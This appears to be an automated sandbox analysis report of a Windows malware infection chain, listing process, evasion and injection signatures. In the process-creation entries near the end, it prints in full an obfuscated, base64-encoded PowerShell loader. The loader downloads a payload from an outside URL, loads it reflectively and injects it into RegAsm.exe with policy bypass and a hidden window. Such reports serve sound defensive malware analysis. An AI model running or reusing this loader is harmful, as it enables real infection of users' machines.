                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040F7E2 Sleep,ExitProcess,11_2_0040F7E2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF7C0C9A1F9 sldt word ptr fs:[eax]10_2_00007FF7C0C9A1F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_0041A7D9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1638Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1537Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4173Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5542Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9339Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1772Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep count: 4173 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2088Thread sleep count: 5542 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5900Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6176Thread sleep count: 258 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6176Thread sleep time: -129000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2524Thread sleep count: 143 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2524Thread sleep time: -429000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2524Thread sleep count: 9339 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2524Thread sleep time: -28017000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 0000000A.00000002.1435352325.0000026F45BC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_11-48800
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00443355 mov eax, dword ptr fs:[00000030h]11_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004120B2 GetProcessHeap,HeapFree,11_2_004120B2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043BB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434BD8 SetUnhandledExceptionFilter,11_2_00434BD8

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell decode and execute
                  Source: Yara matchFile source: amsi64_7484.amsi.csv, type: OTHER
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CD2008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe11_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419662 mouse_event,11_2_00419662
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
